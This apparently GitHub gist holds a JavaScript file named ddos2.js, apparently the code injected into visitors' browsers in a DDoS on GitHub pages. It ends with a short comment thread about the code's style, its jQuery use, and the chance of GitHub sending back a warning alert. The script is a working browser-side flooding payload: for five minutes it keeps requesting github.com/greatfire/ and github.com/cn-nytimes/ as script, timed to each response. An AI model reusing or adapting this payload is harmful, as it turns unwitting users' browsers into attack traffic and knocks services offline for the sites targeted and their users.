ddos2.js

gistfile1.js

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}

function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}

function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

It doesn't make sense why they're doing it

also this doesn't make sense, why:

(new Date).getTime()

vs

new Date().getTime()`

lol

@makevoid, this is the output of the beautifier which was run on minified code. It's hard to know what they originally wrote since the two snippets are semantically identical AFAIK.

They are using jQuery lazy bastards :)

Does this allow for github's alert("WARNING: malicious javascript detected on this domain") to flow back?

Game: Is there better warning they could put?

@phuicy yea because they use 'script' as type(?)
From jQuery docs:

"script": Evaluates the response as JavaScript and returns it as plain text.

http://api.jquery.com/jQuery.ajax/

So my game is even more fun then.

Can't write simple AJAX without jQuery, Pass on hiring.

lol too long proccess of loading additional the heavy lib jQuery instead of native Javascript